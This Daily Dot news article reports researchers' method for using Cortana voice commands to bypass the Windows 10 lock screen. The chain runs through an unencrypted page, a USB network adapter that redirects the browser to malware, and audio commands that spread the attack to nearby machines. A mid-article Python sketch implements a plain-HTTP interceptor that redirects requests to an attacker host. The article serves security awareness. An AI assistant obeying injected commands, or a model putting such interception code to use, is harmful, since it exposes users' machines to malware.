
Microsoft’s Siri rival is causing huge security problems for Windows 10

Microsoft has resolved the issue, but more could be on the way.


Phillip Tracy


Researchers discovered a way to bypass the Windows lock screen and infect a computer with malware using voice commands via the Cortana virtual assistant.


First reported by Motherboard, independent researchers Tal Be’ery and Amichai Shulman noticed that Cortana, which comes preinstalled on Windows 10, listens and responds to certain voice commands even after a computer goes to sleep. That’s enough to let someone with physical access plug in a USB network adapter and run malicious software.

Using voice commands, hackers can tell Cortana to open a web browser and pull up an unprotected webpage, one that doesn’t encrypt its traffic. The USB network adapter then intercepts the request and redirects the computer to a malicious website, where malware downloads onto the system. All of this happens while the passcode-protected computer innocently displays its lock screen.

That’s not all. Even while the machine is locked, the hacker can connect it to their own Wi-Fi network simply by clicking on that network. Once a hacker gains control, they can use the computer to remotely spread malware to other nearby machines connected to the same local network. They do this by playing a sound file on the first infected computer that tells those machines to access a certain website. For example, it might say, “Hey Cortana, go to Microsoft.com.” Using a proxy called Newspeak, the hackers can then intercept the commands sent from nearby computers and redirect them to malicious sites.
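The key enabling detail in this chain is the unencrypted webpage: over plain HTTP, anything sitting on the network path can read a request and forge the response. As a rough illustration only (this is not the researchers’ actual tooling, and the host name and path used here are hypothetical placeholders), this Python sketch plays the role of the in-path adapter and answers a victim’s plaintext request with a redirect to an attacker-chosen address:

```python
# Toy sketch: why directing a locked machine's browser to a plain-HTTP
# page matters. A device on the network path sees the request in
# plaintext and, since nothing authenticates the response, can answer it
# with a redirect to any host it chooses. "malicious.example" and
# "/update.exe" are hypothetical placeholders.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

ATTACKER_HOST = "http://malicious.example"  # placeholder, not a real site

class RedirectingInterceptor(BaseHTTPRequestHandler):
    """Stands in for a man-in-the-middle on the network path."""

    def do_GET(self):
        # Plain HTTP: the requested path is readable, so we can send the
        # victim a 302 pointing anywhere we like.
        self.send_response(302)
        self.send_header("Location", ATTACKER_HOST + self.path)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet

def demo():
    # Bind the interceptor to an ephemeral local port, serve in the
    # background, then issue one "victim" request against it.
    server = HTTPServer(("127.0.0.1", 0), RedirectingInterceptor)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]

    # http.client does not follow redirects, so we can inspect the
    # interceptor's forged answer directly.
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request("GET", "/update.exe")
    resp = conn.getresponse()
    status, location = resp.status, resp.getheader("Location")
    conn.close()
    server.shutdown()
    return status, location

if __name__ == "__main__":
    print(demo())  # (302, 'http://malicious.example/update.exe')
```

An HTTPS page would resist this: the browser would reject a forged response because it isn’t signed by the site’s certificate, which is why the attack specifically relies on an unprotected page.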


You can get an idea of how a locked computer can be accessed via Cortana from a YouTube video that Motherboard unearthed.

Microsoft fixed the vulnerability after the researchers reported it. But Be’ery and Shulman told Motherboard that Cortana still responds to certain commands while a machine is locked, and they’re investigating whether other vulnerabilities exist.

We’ve seen hackers take over machines by infecting wireless accessories, like a keyboard or mouse. But the only incident we’re familiar with that involves voice assistants requires advanced techniques. In September, scientists from China’s Zhejiang University published research demonstrating the use of ultrasonic (inaudible high-frequency) sound to break into voice assistants like Siri, Alexa, and Cortana. It’s an interesting technique, but not a viable method for most hackers.


The issue that plagued Windows machines is much more alarming, and it shows that even the latest technologies create new security vulnerabilities for hackers to exploit.

The Daily Dot